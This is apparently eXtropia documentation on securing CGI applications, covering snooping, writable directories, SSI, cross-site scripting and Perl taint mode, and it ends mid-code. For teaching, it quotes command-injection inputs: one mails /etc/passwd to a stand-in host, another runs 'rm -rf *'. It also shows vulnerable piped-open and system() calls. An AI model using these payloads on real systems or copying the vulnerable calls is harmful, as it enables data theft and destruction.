eXtropia: the open web technology company
eXtropia ADT Documentation

Web Security and eXtropia Applications



    "All data is fraudulent. All communications are attempted hacks. All clients are thieves. Technology is only my first and weakest line of defense" - morning litany for a Web Server Administrator

The minute you connect your computer to the Internet is the minute that the security of your data has been compromised. Even the most secure systems, shepherded by the most intelligent and able system administrators, and employing the most up-to-date, tested software available, are at risk every day, all day. As was proven by Kevin Mitnick in the celebrated cracking of the San Diego Supercomputer Center in 1994, even the defenses of seasoned security veterans like Tsutomu Shimomura can be cracked.

The sad fact is that crackers will always have the upper hand. Time, persistence, creativity, the complexity of software and the server environment, and the ignorance of the common user are their weapons. The system administrator must juggle dozens of ever-changing, complex security-related issues at once while crackers need only wait patiently for any slip-up. And of course, system administrators are only human.

Thus, the system administrator's job certainly cannot be to build a ``cracker-proof'' environment. Rather, the system administrator can only hope to build a ``cracker-resistant'' environment.

A cracker-resistant environment is one in which everything is done to make the system ``as secure as possible'' while making provisions so that successful cracks cause as little damage as possible and can be discovered as soon as possible.

Thus, for example, at minimum the system administrator should back up all of the data on a system so that if the data is maliciously or accidentally erased or modified, as much of it as possible can be restored.

    NOTE: By the way, don't think that just because your job title is not officially "system administrator" that this does not apply to you. In fact, as soon as you implement a CGI application, you become a system administrator of sorts. For example, the implementer of a WebStore CGI application will have her own users, data files, and security concerns. Thus, it is also your responsibility to make security your number one concern.

Here is a rough checklist of minimum-level security precautions:

1. Make sure users understand what a good password is and what a bad password is. Good passwords cannot be found in a dictionary and take advantage of letters, numbers and symbols. Good passwords are also changed with some regularity and are not written on scraps of paper in desk drawers.

2. Make sure that file permissions are set correctly. All files should be given the absolute minimum access rights.

3. Make sure to keep abreast of security announcements, bug fixes and patches. For example, put yourself on a CERT (http://www.cert.org/) or a CIAC (http://www.ciac.org/) mailing list and/or return regularly to the sites that distribute the code you use. For eXtropia applications, add yourself to the mailing list in order to get security bulletins.

4. Attempt to crack your site regularly. Learn the tools the crackers are using against you and try your best to use those tools to crack yourself.

5. Make regular backups.

6. Create and check your log files regularly.


What is the Worst That Can Happen

Protecting a site is a serious matter and one that everyone should take time to address. Unfortunately, too many web server administrators make the mistake of saying that, "Since I don’t have a high visibility site, and since I don't have a beef with anyone, no one will bother to mess with me."

In fact, you are a target as soon as you have a web presence. Many crackers need no greater excuse than the desire to cause mischief to crack your site.

Once a cracker has access to your system, he or she can do all sorts of mean and nasty things.

Consider some of the following possibilities:

1. Your data/files are erased.

2. Your data/files are sold to your competitor.

3. Your data/files are modified. Check out what happened to the CIA site and others at http://www.2600.com/hacked_pages/.

4. The cracker uses your site to launch attacks against other sites. For example, the cracker attempts to crack the White House server as you.

5. The confidential information provided by your clients is accessed and used against them. ``Well, Mr. Powers, I see from this log file that you have purchased one Swedish penis enlarger!''

6. The cracker uses your account to launch attacks against other users on the same box. Other innocent users have all this happen because of you.


Security and Web Servers

Web services are some of the most dangerous services you can offer.

Essentially, a web server gives the entire net access to the inner workings of your file system. What is worse, since web server software has only been around since the early 1990s, the security community has had only a limited amount of time to scrutinize it for security holes. Thus, web servers amount to extremely powerful programs which have only been partially bug-tested.

If that were not bad enough, web servers are typically administered by new web server administrators with perhaps more experience in graphic design than server administration. Further, many web servers are home to hundreds of users who barely know enough about computers to write HTML and who are often too busy with their own deadlines to take a moment to read things such as this.

This is not to point fingers at anyone. Few people have time or inclination to master security. And that is as it should be. The point is that bad passwords, poorly written programs, world readable files and directories and so forth will always be part of the equation and these are not things that only security gurus can control.


Web Security and CGI Applications

Beyond the fact that web servers are insecure to begin with, web servers make a bad situation worse by allowing users to take advantage of CGI applications.

CGI applications are programs that reside on a server and can be run from a web browser. In other words, CGI applications give Joe Cyberspace the ability to execute powerful programs on your server that in all likelihood are first generation, designed by amateurs, and full of security holes.

Yet, since most users have grown to expect CGI access, few system administrators can deny their users the ability to write, install and make public CGI applications of all sorts.

So what is a system administrator to do and how can users of CGI applications help to promote the security of the server as a whole?

As is the case with all security, the administrator and users must attempt to address the following precautions:

1. CGI applications must be made ``as safe as possible''.

2. The inevitable damage caused by cracked CGI applications must be contained.


Reviewing Applications

Needless to say, every application installed on a server should be reviewed by as many qualified people as possible. At the very least, the system administrator should be given a copy of the code (before and after your modifications), information about where you got the code, and anything else she asks for.

Don't think of your system administrator as a paranoid fascist. She has a very serious job to do. Help her to facilitate a safer environment for everyone even if that means a little more work for you.

Besides that, you should read the code yourself. There is no better time to learn this stuff than now. Although ignorant users will necessarily be part of the security equation it does not give you the go-ahead to be one of those users.

And remember, any bit of code that you do not understand is suspect. As a customer, demand that application authors explain and document their code clearly and completely.

However, you have a further responsibility. You have the responsibility to keep aware of patches, bug fixes, and security announcements. It is likely that such information will be posted on the site from which you got the application. It certainly is posted on eXtropia. As new versions come out, you should do your best to upgrade. And when security announcements are issued, you must make the necessary modifications as soon as possible.

The fact that the information is available to you means that the information is also available to crackers who will probably use it as soon as it is available.

This point is particularly important for all you freelance CGI developers who install applications for clients and then disappear into the sunset. It is essential that you take the responsibility to develop an ongoing relationship with your clients so that when security patches are released you can notify them so that they can hire you or someone else to implement the security changes.


Writing Safe CGI Applications

Although this section is primarily focused on installing and customizing pre-built web applications, no discussion of security would be complete without a note on writing safe code. After all, some of the installation/customization work you do might involve writing some code.

Perhaps the best source of information on writing safe CGI applications is Lincoln Stein's WWW Security FAQ (http://www.w3c.org/Security/faq/). Lincoln Stein is a gifted CGI programmer with several public domain talks and FAQs regarding techniques for writing safe CGI.

You should not even consider writing or installing a CGI application until you have read the entire FAQ. However, we will reproduce the most important warning since it should be said several times.

In the FAQ, Stein writes the following:

    "Never, never, never pass unchecked remote user input to a shell command. In C this includes the popen() and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.

    Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous. The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.

        $mail_to = &get_name_from_input; # read the address from form
        open (MAIL,"| /usr/lib/sendmail $mail_to");
        print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
        close MAIL;

    The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent email address. But what if the wily hacker passes an email address that looks like this?

        nobody@nowhere.com; mail badguys@hell.org</etc/passwd;

    Now the open() statement will evaluate the following commands:

        /usr/lib/sendmail nobody@nowhere.com
        mail badguys@hell.org</etc/passwd

    Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password-cracking attack."
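
One common way to sidestep the subshell that Stein warns about is the list form of Perl's piped open(), which runs the program directly and hands it each argument untouched. The following is only a minimal sketch: the helper name run_without_shell is hypothetical, and echo is used as a harmless stand-in for sendmail so that the effect is visible. It assumes a UNIX-like system.

```perl
use strict;
use warnings;

# Hypothetical helper: run a program with user data passed as separate
# arguments. The list form of open() executes the program directly, so
# no /bin/sh ever gets to interpret the user-supplied string.
sub run_without_shell {
    my ($program, @args) = @_;
    open(my $fh, '-|', $program, @args)
        or die "Cannot run $program: $!";
    local $/;                      # slurp all output at once
    my $output = <$fh>;
    close $fh;
    return $output;
}

# The hostile "address" from the quoted example reaches the program as
# one literal argument; the second command is never executed.
my $mail_to = 'nobody@nowhere.com; mail badguys@hell.org</etc/passwd;';
my $echoed  = run_without_shell('echo', $mail_to);
print $echoed;
```

Avoiding the shell does not make the input trustworthy. The address should still be validated before it is handed to any mail program.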

Other CGI security FAQs include:

1. NCSA Security FAQ: http://hoohoo.ncsa.uiuc.edu/cgi/security.html

2. eXtropia Taint Mode FAQ: /tutorials/taintmode.html

3. CGI Security: Better Safe Than Sorry: http://www.irt.org/articles/js184/index.html


Stopping Snoopers

Have you ever investigated a web site by modifying the URL? For example, let's look at one of the pages on eXtropia that can be found at /news.html.

Notice that we are looking at the news.html document that is in the root directory of the web server ``www.extropia.com''.

Suppose we are interested in knowing what other documents are located in the ``private_stuff'' directory (perhaps documents under development, documents which have been forgotten about, or documents which might have unlisted links for internal use only). To find out, we remove the ``news.html'' reference and test to see if the web administrator has configured the web server to generate a dynamic index and has not included an index file.

In this case we have not.

What comes back is a dynamically created index page listing all files and sub-directories. In fact, many servers on the web are configured so that if the user has not provided an index.html file, the server will output a directory listing of this kind. This is not exactly a security bug. Oftentimes, as is the case with our site, the system administrators wanted users to be able to view directory structures.

However, if the server is set to produce a dynamically generated index of a cgi-bin directory, the results can be devastating. There are several precautions you can take:

1. Configure the web server to not generate dynamically produced indexes but return an error message instead.

2. Configure your web server to not serve any document other than .cgi documents from within a cgi-bin directory tree.

3. Provide an index.html file with nothing in it so that even if the web server is not configured for CGI security, the cracker will be stopped in their tracks.

4. Move as many of the sensitive files as you can out of the web document tree.
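
As a rough aid for the third precaution, a small script can report which directories in a document tree have no index.html file. This is only a sketch under stated assumptions: the function name dirs_without_index is hypothetical, and the index file is assumed to be called index.html (your server may be configured to look for other names).

```perl
use strict;
use warnings;
use File::Find;

# Return the directories under $root that contain no index.html file.
sub dirs_without_index {
    my ($root) = @_;
    my @missing;
    find(sub {
        return unless -d $_;                 # only look at directories
        push @missing, $File::Find::name
            unless -e "$_/index.html";       # $_ is relative to the current dir
    }, $root);
    my @sorted = sort @missing;
    return @sorted;
}

# Example use: pass the document root on the command line.
print "$_\n" for dirs_without_index($ARGV[0]) x !!@ARGV;
```

Each directory it prints is one where a server with dynamic indexing enabled would show a listing.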

There is another aspect of the snooper that you should definitely be aware of when installing pre-built applications. Snoopers have just as much ability to download the source code and read through it as you do. Thus, they are aware of all of the pre-configured options that are set by default.

In particular, they are aware of filenames and relative directory locations. Thus, if you do not change the default names of files and directories, even if you have stopped them from using the back door and getting directory listings as shown above, they will still know what is available and can access it directly.

In other words, if I know that you are using ``CGI application A'' and that ``CGI application A'' uses a file called ``users.dat'' in a subdirectory called ``Users,'' I might request that file directly by its URL instead of hunting for a directory listing.


In such a way, a cracker could easily gain sensitive information.

As a result, it is crucial that you also rename any file or directory that contains sensitive information. Once you have made it impossible for the cracker to get a dynamically generated index and you have changed all filenames and directory names, it will be much more difficult for the cracker to find her way in.


Writable Directories

It is pretty much unavoidable. Any truly complex CGI application is going to have to write to the file system. Examples of writing to the file system include adding to a password file of registered users, creating lock and log files, or creating temporary state maintenance files.

The problem with this is two-fold. First, if the web surfer is given permission to write, she is also, necessarily, given permission to delete. Writing and deleting come hand in hand. They are considered equal in terms of server security.

The second problem with writable files is that it is possible that a cracker could use the writable area within your cgi-bin tree to add a CGI application of their own. This is particularly dangerous on multi-user servers such as those used by your typical ISP. A cracker need only get a legitimate account at the same ISP you are on long enough to exploit the security hole. This amounts to 20 minutes worth of payment on their part.

    NOTE: By the way, this cracker tactic of getting an account on your ISP also has serious implications for "snooping". If the cracker can get an account on your server, there is little to stop her from getting at your cgi-bin directory and snooping around. With luck, your ISP runs a CGI wrapper which will obfuscate your cgi-bin area to some degree, but one way or the other, so long as you host your web site on a shared server, your security is seriously compromised. This makes backups even more crucial!

For the most part, the solution to this is to never store writable directories or files within your cgi-bin tree. All writable directories should be stored in less sensitive areas such as outside of your HTML tree or in directories like /tmp that are already provided for insecure file manipulation. A cracker could still erase your data but they could not execute their own rogue CGI application.

However, as we said before, security is as much about containing damage as it is about plugging holes. Thus, it is essential that you protect all files against writing unless you are currently working on them. In other words, if you are not editing an HTML file, it should be set to read-only access. If you are not currently editing the code of a CGI application, it should be stored as read-execute-only.

In short, never grant write permission to any file on your web server unless you are specifically editing that file.
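
The rule above can be checked mechanically on a UNIX-like system. The sketch below is one possible approach, not a complete audit tool: the function names are hypothetical, and it only looks at the traditional permission bits (it knows nothing about ACLs or file ownership).

```perl
use strict;
use warnings;
use File::Find;

# List regular files under $root that are writable by group or others
# (permission bits 020 or 002).
sub group_or_world_writable {
    my ($root) = @_;
    my @found;
    find(sub {
        return unless -f $_;
        my $mode = (stat _)[2];          # reuse the stat data from -f
        push @found, $File::Find::name if $mode & 022;
    }, $root);
    my @sorted = sort @found;
    return @sorted;
}

# Remove every write bit from a file, leaving read and execute bits alone.
sub make_read_only {
    my ($path) = @_;
    my $mode = (stat $path)[2] & 07777;
    chmod($mode & ~0222, $path) or die "chmod $path: $!";
    return;
}
```

A file made read-only this way has to be given its write bit back before you edit it, which is exactly the discipline this section recommends.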

Finally, always back up your files regularly.


User Input

All input is an attempted hack. All input is an attempted hack. All input is an attempted hack. Learn those words and repeat them to yourself every day. It is essential for you to consider all information that comes into your CGI application as tainted. The example shown earlier provided by Lincoln Stein is a good example of the kinds of havoc a cracker can create with tainted data. A cracker could easily attempt to use your CGI to execute damaging commands.

An interesting addition to what Stein has to say relates to Server Side Includes (SSI). That is, if your server is set to execute server side includes, it is possible that your CGI application could be used to execute illegitimate code.

Specifically, if the CGI application allows a user to input text that will be echoed back to the web browser window through plain HTML files, the cracker could easily input SSI code. This is a common misconfiguration error for programs like guestbooks. The solution to this problem, of course, is to filter all user data and remove any occurrence of SSI commands. Typically, this is done by changing all occurrences of ``<!--'' to ``&lt;!--''. Thus, SSI commands will be printed out instead of executed.

A better option is to disable SSI command execution altogether, since it is even more dangerous than CGI, especially when combined with CGI.
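
For servers where SSI must stay enabled, the filtering step can be sketched in a few lines of Perl. This sketch assumes that SSI directives always start with the HTML comment opener and that escaping the leading angle bracket is enough to stop the server from parsing them. The function name neutralize_ssi is hypothetical.

```perl
use strict;
use warnings;

# Escape the start of every HTML comment so that an SSI directive such as
# <!--#exec cmd="..." --> is displayed as text instead of being parsed.
sub neutralize_ssi {
    my ($text) = @_;
    $text =~ s/<!--/&lt;!--/g;
    return $text;
}

my $entry = 'Nice site! <!--#exec cmd="ls" -->';
print neutralize_ssi($entry), "\n";
```

Note that this also disables ordinary HTML comments in user input, which is usually acceptable for something like a guestbook entry.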


Cross Site Scripting Problem

In February 2000, CERT posted advisories related to CSS-- Cross Site Scripting. No, this is not the same as CSS, Cascading Style Sheets, but rather is the unfortunate acronym that CERT assigned to this problem.

In a nutshell, the advisory ultimately related to the fact that you cannot trust user input in CGI scripts, especially if that input will be used to produce further output from the CGI script.

Previously we talked about how user input needs to be watched relative to causing damage to your web site. But what about the other visitors to your site?

Badly coded HTML can be equally annoying or, if it takes advantage of browser security problems, dangerous. Consider a piece of JavaScript code that continually places alert() dialog boxes on a user's browser. That user would probably not want to come back to your site soon afterwards.

However, if you allow other users to post HTML into a message forum, guestbook, or another application where users share information, then you are opening your web site to this problem of Cross Site Scripting, where a user can post malicious code on your application that other users access.

To avoid this problem, there are a few things you should consider doing in such applications. First, you could use Extropia::DataHandler::HTML. This data handler escapes HTML tag characters so that they are rendered useless (e.g., < is replaced with &lt;). Another technique is to enable authentication for user data submissions so that you can keep track of who posted malicious HTML code.
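
The kind of escaping described above can be illustrated with a short, generic routine. This is not the Extropia::DataHandler::HTML implementation, whose interface is not shown here. It is only a sketch of the idea, and the function name escape_html is hypothetical.

```perl
use strict;
use warnings;

# Replace the characters that have special meaning in HTML with entities
# so that user-supplied text is displayed rather than interpreted.
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;     # must come first, or it would re-escape the others
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

print escape_html('<script>alert("gotcha")</script>'), "\n";
```

The escaping should be applied at the point where user data is written into a page, so that every path to the output goes through it.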

In addition, because there are problems with how browsers interpret different character sets, the < > can sometimes have aliased characters in a different character set. To get around this problem, the character set should be explicitly stated along with the Content-Type header. Note that the latest versions of CGI.pm and the Apache web server tack on an explicitly stated character set by default since the CSS issue was announced by CERT.
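
Stating the character set explicitly takes only one line in a hand-written header. The sketch below assumes your pages are actually encoded in the character set you name. ISO-8859-1 is used as the default purely for illustration, and the function name content_type_header is hypothetical.

```perl
use strict;
use warnings;

# Build a CGI response header that names the character set explicitly,
# followed by the blank line that ends the header section.
sub content_type_header {
    my ($charset) = @_;
    $charset = 'ISO-8859-1' unless defined $charset;   # illustrative default
    return "Content-Type: text/html; charset=$charset\r\n\r\n";
}

print content_type_header();
```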

To obtain more details on CSS, the following two URLs should help you get started:




Taint Mode: Perl's Personal Paranoid Mode

Another thing to understand about the legitimacy of incoming data is that even the data that is supposedly generated administratively can be tainted. It is very easy, for example, to modify hidden form fields or add custom fields to incoming form data to an application. In fact, a cracker could simply download your HTML form, modify it and submit faulty data to your CGI application from their own server.

Taint mode is a mode in Perl in which all data that has originated from or comes into contact with user input is considered suspect, or tainted. When running in taint mode, Perl makes sure that tainted data cannot be used to perform operations that might have destructive consequences if the data did not fit the expected input to the program. It turns out that this capability is extremely useful for CGI applications.

Unfortunately, only a few references to taint mode documentation exist. Even worse, there are virtually no public domain Perl CGI scripts that enable taint mode and that you could learn from by example.

However, if you would like to learn more, there are still a few useful references. O'Reilly's Programming Perl book has a section on handling insecure data that is also reflected in perldoc's perlsec guide to Perl Security within the Perl distribution. On the FAQ front, Lincoln Stein's WWW Security FAQ is located at http://www.w3c.org/Security/faq/, and our own taint mode security FAQ is at /tutorials/taintmode.html.


What is Taint Mode

Freeware CGI applications are available for download all over the Web. But how many of them are really secure? When you download an application do you check all the logic to make sure it is secure? Do you read through each line of code and anticipate all the ramifications? Most of the time the answer is ``no''. After all, the whole point of downloading software is to get it and run it for free without having to do a lot of work.

Unfortunately, the harsh reality is that if you are really interested in security, there isn't any free lunch out there.

The more complicated a CGI application is, the more likely you will want to find someone else who has already programmed it and avoid doing the work yourself. Also, the more complex a script, the less likely you will care to spend the time scrutinizing it.

The problem is that regardless of how good the author is, every large program has a good probability of having bugs -- with an additional probability that some of them may be security bugs.

However, unlike other languages, Perl offers an ingenious programming model built to check for security issues: taint mode. Basically, taint mode puts a Perl application into ``paranoid'' mode and treats all user supplied input as tainted unless the programmer explicitly ``OKs'' the data.


Using Taint Mode In CGI Scripts

To enable taint mode for a script on a site which has Perl 5, change the line at the top of your CGI script from

    #!/usr/local/bin/perl

to

    #!/usr/local/bin/perl -T

    Note: your path to the Perl executable may vary depending on your server.

Unfortunately, non-UNIX web servers may have trouble activating taint mode for CGI scripts. CGI scripts running on non-UNIX servers typically do not recognize the magical #!/usr/local/bin/perl first line of the script. Instead, the web server knows which interpreter to execute the script with because of an operating system or web server configuration variable.

For example, for IIS on NT, you should change the association of Perl scripts to run with taint mode on. Unfortunately, this changes the association for all your Perl scripts. You may not want this behavior if you have legacy scripts that are not built to handle taint mode.

A more reasonable way is to get around the problem by creating a second extension under NT such as tcgi or tgi and associate it with taint mode Perl. Then, rename the applications with the new extension to activate taint mode on them. Thus, even if you have legacy scripts that cannot handle taint mode activation, their migration to taint mode can happen in a planned fashion rather than all at once.

You could also try using another web server that understands the first line of scripts. For example, SAMBAR, a freeware NT web server, can be configured to run the script based on the first line of the CGI script. Apache for Windows also has a similar capability. In this case, you would change the first line to read something like the following:

    #!c:\perl\bin\perl.exe -T

    Note: when you execute a taint mode script from the command-line with the Perl executable, you must pass the -T parameter to the Perl executable or Perl will complain that the '-T' argument was passed too late in the first magic line of the Perl file.
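
If you are unsure whether a given way of launching Perl really turns taint mode on, you can ask the interpreter. Perl exposes the read-only variable ${^TAINT}, which is 1 when running with -T and 0 otherwise. The sketch below starts a child Perl from the command line with and without the switch and reports what the child sees. The helper name child_taint_flag is hypothetical.

```perl
use strict;
use warnings;

# Launch a child Perl with the given switches and return the value of
# ${^TAINT} as seen by that child. $^X is the path of the running Perl.
sub child_taint_flag {
    my @switches = @_;
    open(my $fh, '-|', $^X, @switches, '-e', 'print ${^TAINT}')
        or die "Cannot start $^X: $!";
    my $flag = <$fh>;
    close $fh;
    return $flag;
}

print "with -T:    ", child_taint_flag('-T'), "\n";
print "without -T: ", child_taint_flag(),     "\n";
```

Printing ${^TAINT} from a CGI script during testing is a quick way to confirm that the web server is honoring the first line of the script.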


What To Do After Taint Mode Is On

You should test your application thoroughly to see if turning on taint mode stops any valid part of your program from executing. Usually the majority of your application will work well. In fact if you are lucky, the whole program may work without any changes at all!

The major caveat to this is that taint mode is not a compile time check. It is a run-time check.

Run-time checking means that taint mode Perl is constantly and vigilantly checking to see if the application is going to do anything unsafe with user input while the program runs. It does not stop checking after the application first loads and compiles (compile-time checking).

Unfortunately, run-time checking means that you need to test all logical paths of execution your application might take so that ``legal operations'' do not get halted because of taint mode. Taint mode, because it is ultra paranoid, will likely stop actions that you want your program to take. Thus, you must go through the program with a fine-tooth comb. If any part of your program fails to execute, then you need to find out what taint mode does not like about the program and rectify it.

Fortunately, the applications and objects in this book have been thoroughly tested with taint mode. However, if you add your own additions or objects, you should always conduct a test of the operations of your program to make sure it is still doing what you want.

Likely, if there is a problem with taint mode, you will encounter an error in the Web Server error log. For example, if we try to run a program with tainted user input passed to a system call, we would get something that looks like the following error:

    Insecure dependency in system while running with -T switch at ...

Likewise, if we have an unclean PATH, a system call may complain about the path being insecure:

    Insecure $ENV{PATH} while running with -T switch at ...
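
The usual remedy for the PATH complaint, as described in the perlsec documentation, is to set the path explicitly and delete a handful of other environment variables before making any system call. In the sketch below the directories /bin and /usr/bin are an assumption. Use whatever minimal set your script really needs. The function name clean_environment is hypothetical.

```perl
use strict;
use warnings;

# Give the script a small, fixed environment before any system call.
sub clean_environment {
    $ENV{PATH} = '/bin:/usr/bin';                # assumed safe directories
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};    # variables perlsec says to remove
    return;
}

clean_environment();
```

Because the new PATH value is a literal string in the program and not something inherited from outside, Perl treats it as untainted.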


How Do We Program For Taint Mode

For a CGI application, the main source of user input is user-submitted form data. It is this user input that the Perl application will consider ``tainted''.

This does not mean that you have to immediately jump through a lot of hoops to untaint all the form variables that come in. Not only would that be a big pain to do, but it's unnecessary.

Instead, Perl only considers the combination of form variables plus the use of a potentially ``unsafe'' operation to be illegal. Potentially ``unsafe'' operations are operations that could have a permanent destructive effect if the wrong parameters are passed.

Potentially unsafe operations include, but are not necessarily limited to, system calls of any sort such as using system, backticks or piped open function calls, open calls that can write to disk, unlink which deletes files, rename, as well as the evaluation of code based on user input.

In the example given below, we use ``mail'' as an example program, but really the examples here apply to any system call with command line parameters.

For example, if the CGI object's email form variable is ``tainted'', then the following would still be legal:

    print $cgi->param("email") . "\n";

This passes Perl’s taint mode check because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call, Perl will complain.

    system("mail " . $cgi->param("email"));

This operation is illegal under taint mode. Making an unsafe system call plus passing form data as a command line argument is terribly unsafe and is considered unacceptable by Perl running in taint mode. Consider what would happen if someone entered an email address on the form like

    me@mydomain.com; rm -rf *

This would cause the mail program to be executed with the following command-line:

    mail me@mydomain.com; rm -rf *

The mail program would execute, but at what cost? The semi-colon is a shell metacharacter that tells the operating system shell to launch another command. In this case, that command is the malicious 'rm -rf *', which deletes all files in the current directory and all subdirectories recursively.
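
You can watch taint mode refuse such a call without a web server. The sketch below writes a tiny child script to a temporary file and runs it with -T. Under -T the child's command-line argument is tainted, just as form data would be in a CGI script. Everything here is illustrative: echo stands in for the mail program, the injected command is a harmless echo, and the file and variable names are made up for the example.

```perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Child script: cleans its environment, then tries to pass tainted data
# to a shell command inside eval so the error can be reported.
my $child = <<'END_CHILD';
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
my $email = shift @ARGV;
eval { system("echo mail $email") };
print $@ ? "blocked: $@" : "command ran\n";
END_CHILD

my ($fh, $script) = tempfile(SUFFIX => '.pl', UNLINK => 1);
print {$fh} $child;
close $fh;

# Run the child with -T and a hostile "email address".
open(my $out, '-|', $^X, '-T', $script, 'me@mydomain.com; echo INJECTED')
    or die "Cannot start child: $!";
my $result = do { local $/; <$out> };
close $out;
print $result;
```

The child never reaches the shell: Perl raises its ``Insecure dependency'' error before the command string is executed.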


Shell Metacharacters

A shell metacharacter is a special character that has meaning to a shell or command-line interpreter that tells it to execute a command or perform some action. Therefore, shell metacharacters are the most dangerous to pass to an executable program because they can cause unexpected and undesirable behavior.

The following is a sample list of shell metacharacters:

    & ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r

Clearly, there are security ramifications. With taint mode turned on though, the Perl interpreter will stop this from occurring at all. However, Perl can't tell what is in the CGI object -- it just assumes HTML form data is tainted whether it is friendly or not. Just to be on the safe side, Perl assumes that all users are malicious.

Thus, if you want to perform that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. Remember, Perl only sees that the string was created as a result of user input (such as a form variable). It has no way of knowing whether the string is safe or not until you untaint it with the techniques we outline here.

It is important to emphasize that this advice is true even for hidden form tags in an HTML page. HIDDEN form tags that are not directly entered by a user are considered tainted by Perl because Perl has no way of telling that the user did not enter that form variable.

After all, it is possible for a user to create their own HTML form and place their own hidden tag values on that form. In other words, all form data passed to the CGI script is considered tainted by Perl.


Untainting Using Regular Expressions

The primary way to untaint a variable is to do a regular expression match using parenthetical groups inside the regular expression pattern. In Perl, the text matched by the first parenthetical group is stored in the special variable ``$1'', the text matched by the second parenthetical group is stored in ``$2'', and so on.

Perl considers these new variables that arise from parenthetical groups to be untainted because they arose from a clean operation. Once your regular expression has created these variables, you can use them as your new untainted values.
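
As a quick illustration of how the group variables are filled in, consider the following sketch. The input string and the pattern are hypothetical and chosen only to show which group lands in which variable.

```perl
use strict;
use warnings;

my $data = 'color=blue';                  # hypothetical input
my ($name, $value);

# Two parenthetical groups: the first fills $1, the second fills $2.
if ($data =~ /^(\w+)=(\w+)$/) {
    ($name, $value) = ($1, $2);
    print "name is $name, value is $value\n";
}
```

Always check that the match succeeded before using $1 and $2. After a failed match they still hold whatever an earlier successful match left behind.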

The following will illustrate this:

Email addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. So we want to match this descriptive template. But there is a catch.

Many programs use a leading dash to signify a command-line parameter. So although we allow dashes in the email address, if you want to be extra careful, make sure that the first character of the email address is a word character and not a dash or period. The likelihood that someone really has an email address that begins with a period or dash is relatively low.

Thus, our descriptive template becomes the following:

Match first character as a word character, no extra ones allowed like dashes.

Match 0 or more subsequent characters as word characters that can also include dashes and periods.

Match exactly one @ symbol after the preceding two rules.

Match every character (at least one) for the domain name of the email server after the @ symbol. This can consist of word characters, dashes, and periods.

The regular expression for this template is:

      \w{1}        # match 1 word character
        [\w-.]*    # match 0 or more word character, hyphen or period.
          \@       # match any one @ symbol
        [\w-.]+    # match one or more word character, hyphen or period.

    Note: some of these characters are considered shell meta characters. However, because we are disallowing white space as well as forcing the first character to be a word character not containing any meta characters, we are significantly safer.

Further, let us assume that somewhere in the program a variable called $email has been assigned from the CGI object that contains a value submitted by the user from an HTML form using a statement like the following:

    $email = $cgi->param("email");

The $email variable is now tainted as well. This is because its value arose directly from another variable that contained tainted (user input) data, namely the CGI object form variable returned from the param method.

So to untaint a variable called $email, you would do the following with a regular expression. Notice the addition of the parentheses to create a parenthetical grouping.

    if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
        $email = "$1\@$2";
    } else {
        warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email: $!");
        $email = ""; # successful match did not occur
    }

OK. Let's go over this in a little more detail.

When you use () inside a regular expression, each group of parentheses is mapped to a numbered variable: $1 for the first group, $2 for the second, and so on, counting the opening parentheses from left to right. For example, the first set of parentheses that matches in the regular expression is referred to as $1.

In the above example, the first parentheses surround (\w{1}[\w-.]*). This expression matches exactly one word character (no dashes or periods allowed) followed by zero or more word characters, dashes, and periods. Because of the parentheses, this first match gets assigned to $1 by Perl.

Then, an @ symbol is matched.

Finally, the second set of parentheses ([\w-.]+) matches one or more of any word characters, dashes, and periods. This second match gets assigned to $2 by Perl.

If the regular expression is successful, $1 (first parenthetical match) will equal the username portion of the email address and $2 (second parenthetical match) will equal the domain portion.

Thus, the next command, $email = "$1\@$2"; replaces the previously tainted email variable with the safe counterparts: $1 followed by an @ symbol followed by $2.

Notice that $1 and $2 are both considered untainted now. This is very important to see.

Yes, they did arise from the user input data, but Perl considers these variables special. Perl believes that because they resulted from a regular expression you set up, that you have explicitly checked the data for validity in that regular expression. Thus, $1 and $2 are not considered tainted because Perl believes in your ability to set up a good clean regular expression check.

On the other hand, if the user entered an email address that did not match this ``template'', $1 and $2 will not be set by this match because the regular expression will have failed. The example above would assign $email = "" in this case because we would have executed the else clause.

Of course, if the user is trying to hack your system, this is a good thing. You only want valid email addresses to come through. You should generally check for the failure of the regular expression as we did above. Then, in the else clause you can do something about the bad data.

As an additional plus, checking for the failure of the regular expression allows you to do something such as print an informational message to STDERR about the variable that did not pass taint checking along with the IP address of the user that tried to pass it. An example of this was illustrated in the else block of code above.

When a CGI script prints to STDERR, that output goes to your Web Server's error log. You should always check your error log for potential hack attempts. Of course, you could always add more sophisticated means of notification such as emailing the bad data directly to you.

Also, if you are really worried about your program's integrity, you could use die() instead of warn() to stop the program rather than quietly warning you.

Additionally, the Extropia::Log classes may be useful in this case. For example, Extropia::Log::Composite can allow multiple types of logging to occur given multiple log objects.

There is another reason to use an if statement to check if the taint regular expression match failed or not. The special variable $1 will remain set to the last successful match if the current regular expression was unsuccessful. Thus, if you are doing several regular expression checks such as these, you may get subtle errors in the program if you do not explicitly check if the match failed or not.

For example, the $1 left over from a previous successful regex could carry over to a later, failed regex for a completely different variable. If an email regex succeeded just before a firstname regex failed, the firstname variable would end up holding the email address captured earlier.
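One way to rule out a stale $1 is to keep the match and the assignment together in a small helper, as in the following sketch. The helper name untaint_with and the two patterns are our own illustrations. The email pattern uses the same character rules as the expression above, written as [\w.-] (equivalent to [\w-.]) and anchored with \A and \z so that the whole string has to match.

```perl
use strict;
use warnings;

# Hypothetical helper: return the first captured group only when the
# match succeeds, and undef otherwise, so a stale $1 can never leak out.
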